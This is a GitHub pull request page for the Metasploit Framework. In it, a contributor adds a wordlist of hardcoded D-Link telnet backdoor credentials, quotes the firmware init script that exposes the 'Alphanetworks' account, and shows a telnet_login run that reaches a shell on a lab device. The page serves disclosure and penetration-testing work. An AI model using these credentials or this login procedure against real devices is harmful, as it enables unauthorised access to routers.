Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Already on GitHub? Sign in to your account

password list for the dlink backdoor on some telnet services #1648

Closed
wants to merge 3 commits into
from

Conversation

Projects
None yet
2 participants
Contributor

m-1-k-3 commented Mar 24, 2013

Some dlink devices have a nice backdoor account on the telnet service. I have started collecting these accounts. It is just a first and small list but if there are some other dlink devices in your networks check them:

root@bt:~/msf-git/metasploit-framework# cat /root/firmware/DIR815A1_FW104B01_extracted/rootfs/etc/init0.d/S80telnetd.sh

!/bin/sh

echo [$0]: $1 ... > /dev/console
if [ "$1" = "start" ]; then
if [ -f "/usr/sbin/login" ]; then
image_sign=cat /etc/config/image_sign
telnetd -l /usr/sbin/login -u Alphanetworks:$image_sign -i br0 &
else
telnetd &
fi
else
killall telnetd
fi

$image_sign is in plaintext in the firmware image ... open it in your favorite editor.

Works quite good with the telnet_login module:

Exploiting Demo - 192.168.178.105 / 0 auxiliary(telnet_login) > set RHOSTS 192.168.178.133
USERPASS_FILE => /root/msf-git/metasploit-framework/data/wordlists/dlink_telnet_backdoor_userpass.txt
Exploiting Demo - 192.168.178.105 / 0 auxiliary(telnet_login) > run

[] 192.168.178.133:23 Telnet - [1/8] - Attempting: 'Alphanetworks':''
[
] 192.168.178.133:23 TELNET - [1/8] - Banner: login:
[] 192.168.178.133:23 TELNET - [1/8] - Prompt: Alphanetworks
[
] 192.168.178.133:23 Telnet - [1/8] - Skipping 'Alphanetworks' due to missing password prompt
[] 192.168.178.133:23 Telnet - [2/8] - Attempting: 'Alphanetworks':'Alphanetworks'
[
] 192.168.178.133:23 TELNET - [2/8] - Banner: login:
[] 192.168.178.133:23 TELNET - [2/8] - Prompt: Alphanetworks
[
] 192.168.178.133:23 Telnet - [2/8] - Skipping 'Alphanetworks' due to missing password prompt
[] 192.168.178.133:23 Telnet - [3/8] - Attempting: 'Alphanetworks':'wrgg19_c_dlwbr_dir300'
[
] 192.168.178.133:23 TELNET - [3/8] - Banner: login:
[] 192.168.178.133:23 TELNET - [3/8] - Prompt: Alphanetworks
[
] 192.168.178.133:23 Telnet - [3/8] - Skipping 'Alphanetworks' due to missing password prompt
[] 192.168.178.133:23 Telnet - [4/8] - Attempting: 'Alphanetworks':'wrgn49_dlob_dir600b'
[
] 192.168.178.133:23 TELNET - [4/8] - Banner: login:
[] 192.168.178.133:23 TELNET - [4/8] - Prompt: Alphanetworks
[
] 192.168.178.133:23 Telnet - [4/8] - Skipping 'Alphanetworks' due to missing password prompt
[] 192.168.178.133:23 Telnet - [5/8] - Attempting: 'Alphanetworks':'wrgn23_dlwbr_dir600b'
[
] 192.168.178.133:23 TELNET - [5/8] - Banner: login:
[] 192.168.178.133:23 TELNET - [5/8] - Prompt: Alphanetworks Password:
[
] 192.168.178.133:23 TELNET - [5/8] - Result: wrgn23_dlwbr_dir600b
[] 192.168.178.133:23 TELNET - [5/8] - Banner: login:
[
] 192.168.178.133:23 TELNET - [5/8] - Prompt: alphanetworks
[+] 192.168.178.133 - SUCCESSFUL LOGIN Alphanetworks : wrgn23_dlwbr_dir600b
[] Attempting to start session 192.168.178.133:23 with Alphanetworks:wrgn23_dlwbr_dir600b
[
] Command shell session 1 opened (127.0.0.1 -> 127.0.0.1) at 2013-03-24 21:05:46 +0100

Best,
Mike

Contributor

wchen-r7 commented Mar 25, 2013

It looks like you're also trying to delete an existing module? Why?

Contributor

m-1-k-3 commented Mar 25, 2013

I don't know what was going wrong that this module is in this branch. I have tried to get it out of this branch.

@wchen-r7 wchen-r7 pushed a commit to wchen-r7/metasploit-framework that referenced this pull request Mar 25, 2013

@sinn3r sinn3r Add dlink pass for #1648 5504c58

@wchen-r7 wchen-r7 pushed a commit to wchen-r7/metasploit-framework that referenced this pull request Mar 26, 2013

@sinn3r sinn3r Adds dlink telnet backdoor passwords for #1648 e545213
Contributor

wchen-r7 commented Mar 26, 2013

Closing this, see #1660

@wchen-r7 wchen-r7 closed this Mar 26, 2013

@jlee-r7 jlee-r7 pushed a commit that referenced this pull request Apr 12, 2013

@egypt egypt Land #1660, dlink backdoor wordlist
[Closes #1660][See #1648]
15e2ceb

@dougsko dougsko added a commit to dougsko/metasploit-framework that referenced this pull request Jun 20, 2013

@sinn3r @dougsko sinn3r + dougsko Add dlink pass for #1648 983ad37

@m-1-k-3 m-1-k-3 deleted the m-1-k-3:dlink-telnet-backdoor-passes branch Mar 25, 2014

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment